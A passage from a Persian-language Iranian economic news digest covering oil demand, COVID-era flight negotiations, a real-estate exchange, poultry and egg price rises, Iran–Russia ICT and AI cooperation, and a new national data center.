قیمت نفت بدنبال شیوع ویروس کرونا و وضع قرنطینه که باعث سقوط تقاضا شد، ریزش پیدا کرد و اگرچه نفت در چند ماه گذشته بخشی از این ریزش را جبران کرده اما در نزدیک ۴۰ دلار محبوس مانده است.

آژانس بین المللی انرژی در گزارش ماهانه اش که ۱۳ اوت منتشر شد، تقاضای جهانی مورد پیش بینی برای نفت در سال ۲۰۲۰ را ۸.۱ میلیون بشکه در روز کاهش داد و هشدار داد سفرهای هوایی جهانی کمتر تقاضا برای نفت را کمتر خواهد کرد.

این آژانس دورنمای تقاضا برای نفت را برای نخستین بار در سه ماه گذشته تنزل داد زیرا اپیدمی همچنان مشکلات اقتصادی به بار آورده و باعث بیکاری گسترده در سطح جهانی شده است.

سرمایه گذاران نگرانی فزاینده ای نسبت به تقاضا برای نفت، حاشیه سود ضعیف پالایش، کندی رشد اقتصادی و کندی روند کاهش سطح ذخایر نفت پیدا کرده اند و نفت برنت نخستین کاهش هفتگی خود از ژوئن را روز جمعه تجربه کرد.

ساداموری در این باره گفت: به نظر نمی رسد که برداشت قابل توجه ذخایر نفت هنوز روی داده باشد و ما شاهد اوج گیری قوی ظرفیت پالایش نیستیم و سوخت جت همچنان مشکل بزرگی باقی مانده است.

بر اساس گزارش رویترز، وی در ادامه خاطرنشان کرد: چین که بزرگترین واردکننده نفت جهان است، زودتر از سایر اقتصادهای بزرگ از قرنطینه خارج شد و با استفاده از توان مالی خود، به واردات حجم بالایی نفت پرداخت. این کشور در بحبوحه نابودی تقاضای جهانی برای نفت، نقطه روشنی برای بازار بود اما تنشهای ژئوپلیتیکی ممکن است پایداری و تداوم این روند را دچار ابهام کند.

۱۴: ادامه مذاکرات برای افزایش پروازهای خارجی/ کدام ایرلاین‌ها در آسمان ایران پرواز می‌کنند؟

معاون هوانوردی و امور بین الملل سازمان هواپیمایی کشوری از ادامه داشتن مذاکرات برای افزایش پروازهای خارجی از نظر مقاصد و تعداد آن‌ها خبر داد و گفت: چندین لاین خارجی مسافران ایرانی را جابه‌جا کرده و در آسمان ایران به مقصد کشورشان و دیگر کشورهای خارجی به عنوان پروازهای ترانزیتی پرواز می‌کنند.

مرتضی دهقان در پاسخ به سوالی مبنی بر اینکه با توجه به شیوع ویروس کرونا و ادامه داشتن این اپیدمی در بسیاری از کشورهای جهان، آخرین وضعیت و آینده پروازهای مسافری را چگونه توصیف می کنید و آیا مذاکراتی برای توسعه وگسترش این پروازها داشته اید یا خیر؟ اظهار کرد: حمل و نقل هوایی در سطح دنیا متاثر از شیوع ویروس کرونا با مشکلات زیادی مواجه شده است. به گونه ای که پس از شیوع این بیماری مرزهای هوایی بر روی پروازهای برنامه ای در بسیاری از کشورها بسته شد و فعالیت ایرلاین ها بیشتر به بازگرداندن اتباع خود و یا کمک های امدادی محدود شد.

وی افزود: به تدریج و با انجام اقدامات مقابله ای که دولت ها در کنترل این بیماری انجام دادند همچنین با تدوین و ابلاغ مقررات بهداشتی و قرنطینه ای سختگیرانه اجازه انجام پروازها با شرایط خاص و بصورت محدود داده شد و با کنترل بیشتر این بیماری وضعیت پروازها به تدریج و با شیب ملایم در حال افزایش است. البته برخی از کشورها همچنان در شرایط قبل قرار داشته و نسبت به جابه جایی مسافر اقدام نمی کنند.

معاون هوانوردی و امور بین الملل سازمان هواپیمایی کشوری ادامه داد: از آنجا که رفتار ویروس کرونا چندان شناخته شده نبوده و مسئولین مربوطه هنوز نتوانسته اند زمان مشخصی برای کنترل این بیماری ارائه دهند لذا نمی توان تحلیل دقیقی از وضعیت آینده صنعت حمل و نقل هوایی ارائه داد و سازمان های بین المللی از جمله ایکائو، یاتا  و… نیز پیش بینی های متفاوتی ارائه داده اند. اما تخمین هایی که در ابتدای شیوع این بیماری برای صنعت هوایی صورت گرفته بود اکنون تغییر یافته است.

کاهش تقاضا در صنعت هوانوردی و سفارش هواپیما

به گفته دهقان، می توان با مشاهده برخی اتفاقات تا حدودی شرایط این صنعت را پیش بینی کرد و آن هم وضعیت سفارشات هواپیما توسط شرکت های هواپیمایی است چرا که آمارها نشان می دهد سفارش و درخواست خرید هواپیما در شرکت‌های سازنده هواپیما رو به کاهش است و این امر  نشان می دهد لااقل در کوتاه مدت تقاضا در این صنعت رو به رشد نیست.

وی همچنین درباره آخرین وضعیت پروازهای خارجی در شرایط ویروس کرونا و تغییر و تحولات صورت گرفته در آن نسبت به ماه گذشته، ادامه داد: از زمان شروع این بحران در دنیا، سازمان هواپیمایی کشوری نیز بصورت مستمر پیگیر بازگرداندن اتباع کشورمان و همچنین انجام پروازهای باری و پشتیبانی بود و ارتباطات موثری با کشورهایی که ضرورت برقراری پرواز وجود داشت صورت گرفت. بطوری که هم پرواز به برخی از کشورهای اروپائی و هم آسیایی توسط شرکت های داخلی و برخی از شرکت های خارجی حفظ شد. در حوزه کشورهای همسایه نیز بنا به تقاضای سفر و نیاز کشور، پروازها به صورت محدود شروع و استمرار دارد. البته برخی از کشورها محدودیت هایی برای پذیرش اتباع سایر کشورها در شرایط شیوع کرونا وضع کرده اند که تاثیر مستقیمی روی برقراری پرواز ها دارد.

معاون هوانوردی و امور بین الملل سازمان هواپیمایی کشوری تاکید کرد: پروازهای بین المللی تابع ارزیابی کشورها از وضعیت کنترل بیماری کرونا در سایر کشورها است اما پروازهای داخلی با روند بهتری شروع شده و متناسب با شروع و رونق سایر کسب و کارها در کشور پروازهای داخلی نیز افزایش می یابد. این در شرایطی است که هنوز اماکن گردشگری و مذهبی در کشور محدودیت هایی در پذیرش گردشگران سیاحتی و زیارتی دارند. البته از نظر درآمدی شرکت های هواپیمایی، شرکت های خدمات فرودگاهی، دفاتر خدمات مسافرت هوایی و فرودگاه‌ها با چالش جدی مواجه هستند.

ادامه داشتن مذاکرات برای از سرگیری پروازهای ترکیه و دیگر خارجی‌ها

دهقان همچنین در پاسخ به سوالی درباره اینکه آخرین وضعیت پروازهای ترکیه با توجه به تغییرات و لغو مکرر آنها از سوی مقامات ترک چگونه است و چرا هواپیمای قطری روزانه بسیاری از مسافران ایرانی را به این کشور می برد؟ گفت: بعد از شیوع ویروس کرونا پروازهای برنامه ای مستقیم شرکت های هواپیمایی ایرانی و ترکیه ای با وقفه مواجه شد. با ارزیابی مجدد وضعیت و تدوین مقررات قرنطینه و بهداشتی، اجازه برقراری پروازها با شرایط خاص از سوی طرفین صادر شد که تعداد زیادی از پروازها نیز توسط شرکت های هواپیمایی ایرانی در مسیر ترکیه برقرار و مطابق با مقررات آن کشور در خصوص پذیرش اتباع ایران و کسانی که مجوز ورود به ترکیه داشتند نسبت به جابه جایی مسافر اقدام کردند.

وی افزود: در چند ماه گذشته مذاکراتی بین سازمان هواپیمایی کشوری ایران و ترکیه در خصوص بازگشایی پروازهای برنامه ای صورت گرفت که در نهایت ترکیه برقراری پروازهای برنامه ای را منوط به نظر مقامات بهداشتی آن کشور دانست. ضمنا در حال حاضر شرکت های طرفین مجاز به برقراری پروازهای ویژه برای بازگرداندن اتباع خود و همچنین پروازهای باری و اختصاصی هستند. موضوع برقراری پروازهای برنامه ای مسافری مستقیم بین ایران و ترکیه در دستور کار این سازمان بوده و در حال پیگیری است.

معاون هوانوردی و امور بین‌الملل سازمان هواپیمایی کشوری اظهار کرد: همزمان با انجام پروازهای تعدادی از شرکت های ایرانی به مقاصد بین المللی، برخی  از شرکت های هواپیمایی خارجی از قبیل قطر ایرویز؛ امارات ایرلاین، آرمنیا ایرویز و … پروازهای مستقیم از کشور خود به ایران و بالعکس شروع کرده اند که با توجه به مقررات سایر کشورها در پذیرش اتباع ایران نسبت به جابجایی مسافران بصورت ترانزیت نیز اقدام می‌کنند.

۱۵: آغاز پذیره نویسی بورس املاک و مستغلات از مهرماه

پذیره نویسی بورس املاک و مستغلات از مهرماه و انتخاب نماینده ویژه از اعضای شورای عالی بورس، برای پیگیری موضوع بازگشایی نماد کنتورسازی، مصوبات امروز جلسه شورای عالی بورس بود.

به گزارش بازار سرمایه، حسن قالیباف اصل گفت: شورای عالی بورس امروز آخرین وضعیت راه اندازی بورس املاک و مستغلات و امتیازات را بررسی کرد. در این زمینه مقرر شد تا هیات موسس، اساسنامه را تنظیم و به سازمان بورس و اوراق بهادار ارسال کند تا در صورت تایید نهایی، پذیره نویسی این بورس از مهرماه آغاز شود.

رییس سازمان بورس و اوراق بهادار بررسی موضوع بازگشایی نماد کنتورسازی را دومین مصوبه امروز شورای عالی بورس بیان کرد و ابراز داشت: آخرین وضعیت این شرکت نیز به شورا گزارش و مقرر شد تا انجام اقدامات لازم برای بازگشایی نماد این شرکت از سوی سازمان امور مالیاتی، بانک مرکزی و سازمان تامین اجتماعی سرعت گیرد.

دبیر شورای عالی بورس افزود: در همین راستا، یکی از اعضای شواری عالی بورس به عنوان نماینده ویژه انتخاب شد تا در کنار سازمان بورس و اوراق بهادار، پیگیر  این موضوع باشد تا هرچه سریعتر، نماد این شرکت در بورس بازگشایی شود.

۱۶: زیان ۲۵۰۰ تومانی مرغداران در هر کیلو مرغ/ جوجه‌ریزی کاهش یافت/ قیمت سویا از مرز ۱۲ هزار تومان عبور کرد

رئیس هیات مدیره شرکت مادر تخصصی توسعه صنعت طیور کشور اظهار داشت: متاسفانه براساس برخی مصلحت‌ها می‌گویند مرغ باید ۱۰ هزار تومان باشد و تخم مرغ فلان قیمت، اما چه اتفاقی در بازار می‌افتد اصلا مهم نیست. در بازار هم اکنون قیمت سویا از مرز ۱۲ هزار تومان عبور کرده در صورتی‌که در تصویر ذهنی مسوولان ۲ هزار و ۷۵۰ تومان است. ذرت ۳ هزار و ۶۰۰ است که باز هم در ذهن آقایان هزار و ۶۵۰ تومان است.

برومند چهارآیین در رابطه با بازار مرغ و شرایط تولیدکنندگان اظهار داشت:  سازمان حمایت تصمیم گرفته یک راه غیر کارشناسی را در پیش بگیرد و ثابت کرده به واقعیت‌های جامعه تولید کنندگان نمی‌پردازند و به دنبال مباحث کارشناسی شده به خصوص در مورد قیمت مرغ و تخم مرغ نیست.

وی ادامه داد: متاسفانه براساس برخی مصلحت‌ها می‌گویند مرغ باید ۱۰ هزار تومان باشد و تخم مرغ  فلان قیمت، اما چه اتفاقی در بازار می‌افتد اصلا مهم نیست. در بازار هم اکنون قیمت سویا از مرز ۱۲ هزار تومان عبور کرده در صورتی‌که در تصویر ذهنی مسوولان ۲ هزار و ۷۵۰ تومان است. ذرت ۳ هزار و ۶۰۰ است که باز هم در ذهن آقایان هزار و ۶۵۰ تومان است.

چهار آیین با اشاره به وضعیت نابسامان تولیدکنندگان توضیح داد: اکنون قیمت مرغ برای تولیدکننده ۱۵ هزار تومان است که با قیمت ۱۲ هزار و ۵۰۰ تومان به فروش می‌رسد، یعنی تولیدکننده در حال ضرر است.

رئیس هیت مدیره شرکت مادر تخصصی توسعه صنعت طیور خاطرنشان کرد: این اتفاقات واقعیت‌های بازار است زیرا بازار متشکل از عرضه و تقاضاست و نه یک بخشنامه. باید توجه داشت هیچ کس نتوانسته با بخشنامه مشکلات اقتصادی را حل کند، اگر امکان داشت این امر میسر می‌شد. اما شرایط اقتصادی به حرف کسی گوش نمی‌دهد؛ با کاهش عرضه قیمت‌ها بالا و افزایش عرضه قیمت‌ها را کاهش می‌دهد که متاسفانه مسوولان نمی‌خواهند این واقعیت را بپذیرند.

چهار آیین با اشاره به افزایش نهاده‌های دامی و کم شدن عرضه مرغ در بازار در این زمینه توضیح داد: کمبود عرضه به افزایش قیمت‌ها دامن زده اما این کمبود عرضه ریشه در چه چیزی دارد؟ جوجه به قیمت وحشتناکی رسیده است. از سویی جوجه‌ریزی کاهش پیدا کرده که نتیجه آن کمبود عرضه است. علت کمبود هم ریشه در کمبود دان یا همان نهاده است، نهاده‌ای که مستقیما باید به دست مرغدار برسد اکنون از بازار سیاه تهیه می‌شود، هرچند اعلام کرده‌اند با افزایش قیمت‌ها برخورد تعزیراتی خواهند کرد.

۱۷: افت تولید دلیل گرانی تخم مرغ است/ مرغداران نهاده پیدا نمی‌کنند

رئیس هیات مدیره اتحادیه مرغ تخم گذار با بیان اینکه افت تولید دلیل گرانی تخم مرغ است،گفت:در صورت ادامه این روند طی ماه های آینده با افزایش مجدد قیمت ها مواجه خواهیم بود.

ناصر نبی پور با اشاره به افزایش قیمت تخم مرغ گفت: هم اکنون قیمت هر کیلوگرم تخم مرغ درب مرغداری بین ١٢ هزار و ٣٠٠ تومان تا ١٢ هزار و ۴٠٠ تومان است.

وی با بیان اینکه تولیدکنندگان نرخ مصوب دولت برای تخم مرغ را قبول ندارند، افزود: امروز چهارشنبه نیز ما جلسه‌ای با مسئولان سازمان حمایت برای بررسی قیمت تمام شده تولید داریم.

به گفته وی، در حال حاضر قیمت تمام شده تولید هر کیلوگرم تخم مرغ بیش از ١۴ هزار تومان است.

جیره غذایی مرغ‌های تخم گذار بخاطر گرانی نهاده کاهش یافت؛ سایز تخم مرغ‌ها ریز شده است

این فعال بخش خصوصی دلیل افزایش قیمت تخم مرغ طی روزهای اخیر را کمبود نهاده‌ها و افت تولید اعلام کرد و افزود: ٨۵ درصد جیره غذایی مرغ تخم گذار ذرت و سویا است و وقتی جیره کاهش می‌یابد یا تغییر می‌کند مرغ تخم نمی‌گذارد و وقتی پروتئین جیره غذایی کاهش می‌یابد، سایز تخم مرغ ریز می‌شود.

نبی پور تصریح کرد: هم اکنون قیمت کنجاله سویا به حدود ١۵ هزار تومان رسیده و نرخ ذرت نیز بین ٣٣٠٠ تا ٣۵٠٠ تومان است، قیمت ریز مغذی‌ها نیز ۴٠٠ درصد افزایش یافته و با چنین شرایطی هم به زحمت می‌توان نهاده‌ها را پیدا کرد و خرید. همچنین قیمت پودر گوشت که ارزش غذایی هم ندارد و قبلاً مرغداران حاضر نبودند آن را ۱۲۰۰ هم بخرند، الان به کیلویی ۵٢٠٠ تومان رسیده است.

وی اضافه کرد: بعنوان مثال ما ۶ شهریور جاری حواله‌ای دریافت کرده‌ایم که واردکننده به ما اعلام کرده ٢۵ روز بعد از بارگذاری، این نهاده را تحویل خواهد داد بنابراین در ماه مهر می‌توانیم نهاده را تحویل بگیریم.

بخاطر گرانی نهاده، جوجه یکروزه صرفه اقتصادی ندارد

نبی پور با بیان اینکه بین ٣٠ تا ۴٠ درصد نهاده‌های مورد نیاز تولید با نرخ مصوب به دست تولیدکنندگان رسیده است، افزود: بخاطرکمبود عرضه و گرانی بیش از اندازه نهاده‌های دامی جوجه ریزی کاهش یافته و هم اکنون جوجه گوشتی را به قیمت ۵٠٠ تومان نمی خرند در حالی که قیمت مصوب جوجه یکروزه ٢٩۵٠ تومان است.

وی در بخش دیگری از سخنان خود در واکنش به مباحث مطرح شده از سوی برخی مسئولان مبنی بر اینکه تولیدکنندگان باید اسامی کسانی را که نهاده را خارج از سامانه بازارگاه و به قیمت‌های گزاف تحویل می‌دهند، به سازمان‌های نظارتی اعلام کنند، افزود: اولاً که واسطه‌ها به تولیدکننده فاکتور و مدرک نمی‌دهند که بتواند ارائه کند ضمن اینکه اگر تولیدکننده چنین کاری کند به نحوی در افتادن با این افراد است و بعد از آن تولیدکننده قادر به تأمین نهاده مورد نیاز خود از طریق آنها نخواهد بود بنابراین تولیدکننده ترجیح می‌دهد که کالا را گران بخرد تا اینکه اصلاً نتواند تأمین کند.

نبی پور تصریح کرد: در صورت ادامه این روند قیمت تخم مرغ در پاییز که مصرف افزایش می‌یابد به کیلویی ٢٠ هزار تومان و شانه ای۵٠ هزار تومان می‌رسد و قیمت مرغ نیز به بیش از ٣٠ هزار تومان خواهد رسید.

۱۸: همکاری ایران و روسیه در زمینه هوش مصنوعی

معاون وزیر ارتباطات در نشست آنلاین با معاون وزیر توسعه دیجیتال روسیه از علاقمندی ایران برای همکاری مشترک در حوزه‌های هوش مصنوعی، دولت الکترونیک، شهر هوشمند و توسعه کسب و کارهای نوین با این کشور خبر داد.

به گزارش مرکز روابط عمومی و اطلاع رسانی وزارت ارتباطات، دومین نشست کار گروه همکاری های ایران و روسیه در حوزه ارتباطات و فناوری اطلاعات به صورت آنلاین برگزار شد.

حمید فتاحی معاون وزیر ارتباطات و فناوری اطلاعات در این نشست با اشاره به همه‌گیری کوید ۱۹ در دنیا، گفت: این پاندمی همکاری کشورها در زمینه ارتباطات و فناوری اطلاعات را بیش از گذشته به یک ضرورت تبدیل کرده است.

وی افزود: اگر بیش از این کارشناسان این حوزه صحبت از انقلاب صنعتی چهارم و تحول دیجیتال می کردند اما امروز با فراگیر شدن این پاندمی و بیماری در سطح جهان، همه مردم بیش از گذشته به تاثیر ارتباطات و فناوری اطلاعات پی برده اند.

فتاحی با اشاره به اینکه روابط ایران و روسیه از روند رو به رشدی برخوردار بوده است، تصریح کرد: وزارتخانه های دو طرف و وزرای ایران و روسیه جلسات متعددی در این حوزه داشتند که مهم ترین این اقدامات برگزاری اجلاس چهار جانبه ایران، روسیه، آذربایجان و ترکیه بود.

 وی با اشاره به اینکه توافقات خوبی در این جلسات انجام شده است، افزود: این جلسه مربوط به توافق وزیر ارتباطات ایران و وزیر توسعه دیجیتال، ارتباطات و رسانه های جمعی روسیه در فروردین سال ۹۶ است که در نخستین دور این گفتگو ها درباره کلیات مورد توافق به جمع بندی رسیدند.

معاون وزیر ارتباطات تصریح کرد: در نخستین جلسه، دو سند مربوط به حوزه ارتباطات و فناوری اطلاعات و فضایی به امضای طرفین رسید.

وی با اشاره به اینکه این تفاهم نامه ۴ محور داشت، افزود: همکاری در زمینه مخابرات و سرویس های پستی و پست مالی، همکاری در زمینه سرویس های ارتباطات و اقتصاد دیجیتال، همکاری در زمینه امنیت اطلاعات و همکاری در زمینه های آموزشی و پژوهشی، موضوعات محورهای این همکاری هستند.

فتاحی تصریح کرد: توافق نامه در حوزه امنیت اطلاعات به مراحل پایانی خود رسیده است و دو طرف آماده  امضای آن هستند.

وی با اشاره به برگزاری دومین نشست کار گروه همکاری های ایران و روسیه در حوزه ICT، افزود: این جلسه در سه کمیته مخابرات و نظارت رادیویی، کمیته فناوری اطلاعات و کمیته امنیت اطلاعات برگزار می شود و موضوعات مورد توافق در اسناد جداگانه ای برای امضا ارسال می شود.

معاون وزیر ارتباطات با اشاره به زمینه های بسیار برای همکاری دو طرف، گفت: هوش مصنوعی، دولت الکترونیک، شهر هوشمند و توسعه کسب و کارهای نوین موضوعاتی هستند که امکان همکاری وجود دارد و من از طرف دولت ایران اعلام می کنم در این زمینه ها آمادگی کامل برای همکاری داریم، همانطور که در دیدارهای وزرای قبلی نیز مورد تاکید بوده است.

وی افزود: بخشی از تفاهم های قبلی اجرایی شده و بخشی نیز نیاز به بررسی در لایه های کارشناسی دارد.

همچنین، «ماکسیم پارشین» معاون وزیر توسعه دیجیتال، ارتباطات و رسانه های جمعی روسیه نیز در این نشست مجازی با اشاره به ظرفیت ها و توانایی های این کشور در حوزه ارتباطات و فناوری اطلاعات، گفت: روسیه از سال ۲۰۱۸ یکی از محورهای توسعه خود را ایجاد فضای دیجیتال قرار داده است.

وی با اشاره به تجربیات بسیار کشورش در حوزه های الکترونیکی، اعلام آمادگی کرد:می توانیم این تجربیات را مانند حکمرانی الکترونیکی و شهرهای هوشمند با ایران به اشتراک بگذاریم.

پرشین، به گفت و گوهای سازنده بین وزرای ایران و روسیه اشاره کرد و گفت: همچنین شرکت های تجاری و بخش خصوصی این کشور نیز علاقمند هستند با شرکت های ایرانی همکاری کنند.

بر اساس این گزارش، در ادامه این نشست نمایندگان شرکت ها و سازمان های روسیه با نمایندگان شرکت های ایرانی حاضر در این نشست به بحث و بررسی زمینه های همکاری مشترک در حوزه موضوعات مشخص شده پرداختند.

۱۹: رشد صنعت ICT کشور حاصل تلاش بخش خصوصی، سرمایه‌گذاران و تولیدکنندگان است

وزیر ارتباطات و فناوری اطلاعات، نقش بخش خصوصی در رشد و توسعه صنعت ارتباطات و فناوری اطلاعات کشور را حائز اهمیت دانست.

به گزارش وزارت ارتباطات و فناوری اطلاعات، محمدجواد آذری جهرمی در دیدار با نمایندگان کمیته سنا (سندیکای مخابرات ایران، نظام صنفی یارانه‌ای کشور، اتحادیه صادرکنندگان خدمات مهندسی، مشاوران و پیمانکاران صنعت مخابرات ایران) و با حضور جمعی از مدیران و معاونان وزارت ارتباطات و فناوری اطلاعات گفت: رشد اقتصادی بخش صنعت ICT کشور در دولت یازدهم و دوازدهم نسبت به ابتدای دولت یازدهم قابل‌توجه بوده است.

وی افزود: سهم اقتصاد دیجیتال در GDP به ۶.۵ رسیده است و سهم بازار ICT که حاضران این جلسه آن را مدیریت می‌کنند ۴.۵ درصد شده است و این رشد ۱.۷ دهم برابری را نشان می‌دهد نسبت به آنچه در ابتدای دولت یازدهم بوده است.

وزیر ارتباطات ادامه داد: رشد و توسعه صنعت ارتباطات و فناوری اطلاعات، رشد اقتصادی و رفاه مردم را رقم‌زده است. در طول هفت سال دولت‌های یازدهم و دوازدهم، مشترکان اینترنت در کشور ۵.۶ برابر افزایش داشته است، متوسط سرعت اینترنت هم ۲۷ برابر شد و متوسط قیمت بر اساس حجم نصف شده است.

آذری جهرمی تأکید کرد: همه این اتفاقات حاصل تلاش بخش خصوصی، سرمایه‌گذاران و تولیدکنندگان بوده است که در کنار هم این رشد را در کشور رقم زدند؛ بنابراین بخش خصوصی در توسعه صنعت ICT در کشور نقش ویژه حائز اهمیتی داشته است.

در ابتدای این جلسه نمایندگان کمیته سنا به ارائه گزارشی از فعالیت‌ها و اقدامات حوزه کاری و همچنین موانع و مشکلات پیش روی خود پرداختند که وزیر ارتباطات و فناوری اطلاعات برای برخی از مشکلات و موانع پیش روی فعالان بخش حوزه ارتباطات و فناوری اطلاعات راهکارهایی را مطرح کرد و برای تعدادی دیگر قول پیگیری داد.

۲۰: احداث مرکز داده مادر شبکه ملی اطلاعات در ۶ ماه

معاون وزیر ارتباطات گفت: برای راه‌اندازی و توسعه شبکه ملی اطلاعات، تنها ۶ ماه فرصت داشتیم و در این مدت انواع و اقسام مشکلات بر سر راه ما قرار داد، اما در نهایت موفق شدیم.

حمید فتاحی در افتتاحیه مرکز داده مادر شبکه ملی اطلاعات (شهید حاج قاسم سلیمانی) که در پردیس بومهن برگزار شد، گفت: کارهای مربوط به توسعه این مرکز پس از دستور رهبر معظم انقلاب اسلامی آغاز شد و ظرف مدت زمان کوتاهی توانستیم این مرکز را به مرحله بهره‌برداری برسانیم.

مدیرعامل شرکت ارتباطات زیر ساخت گفت: امروز شاهد افتتاح پروژه مرکز داده مادر شبکه ملی اطلاعات هستیم که هدف آن حمایت از خدمات پایه، ایجاد و فراهم کردن زیرساخت‌های لازم است و با تاکیدی که وزارت ارتباطات روی این مساله داشت، ظرف مدت زمان شش ماه توانستیم این فضا را توسعه بدهیم.

حمید فتاحی با بیان این که تیم‌های مربوط به خدمات پایه و پلتفرم‌های پایه در شبکه‌ ملی اطلاعات در هر لحظه مشغول به کار و فعالیت هستند، افزود: برای راه‌اندازی مرکز داده مادر شبکه ملی اطلاعات فرصت اندکی در اختیار داشتیم و برخی قوانین بالادستی، موانعی را سر راه ما قرار دادند که بودجه نیز یکی از آن موارد بود. موضوعات دست و پا گیری سر راه ما قرار گرفت که هر زمان نیاز باشد آن را با کمیسیون صنایع در میان خواهیم گذاشت و برای‌شان تشریح می‌کنیم که وقتی برای عمل وارد میدان می‌شویم چقدر همه چیز متفاوت است.

معاون وزیر ارتباطات افزود: فشار و تحریم بین‌المللی تلاش می‌کند گسترش مسیرهای ارتباطی مبتنی بر تکنولوژی جهانی را برای ما سخت کند، اما مراکز داده با زیرساخت ارتباطی مطمئن و زیست بوم امنی که به وجود می‌آورد که بر مبنای ارزش‌ها و هنجارهای داخلی ما است.

او در خصوص ظرفیتی که در فاز نخست این مجموعه ایجاد شده است، تاکید کرد: این مرکز داده ۱۳هزار و ۶۰۰ ظرفیت هسته پردازشی ایجاد کرده است و ایجاد۱۰ بتابایت ایجاد فضای ذخیره سازی، تبادل ترافیک با ظرفیت یک ترابیت بر ثانیه، احداث مرکز بین الملل با ظرفیت ۴۰۰ گیگابیت بر ثانیه توسعه زیرساخت‌های کشور را موجب می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران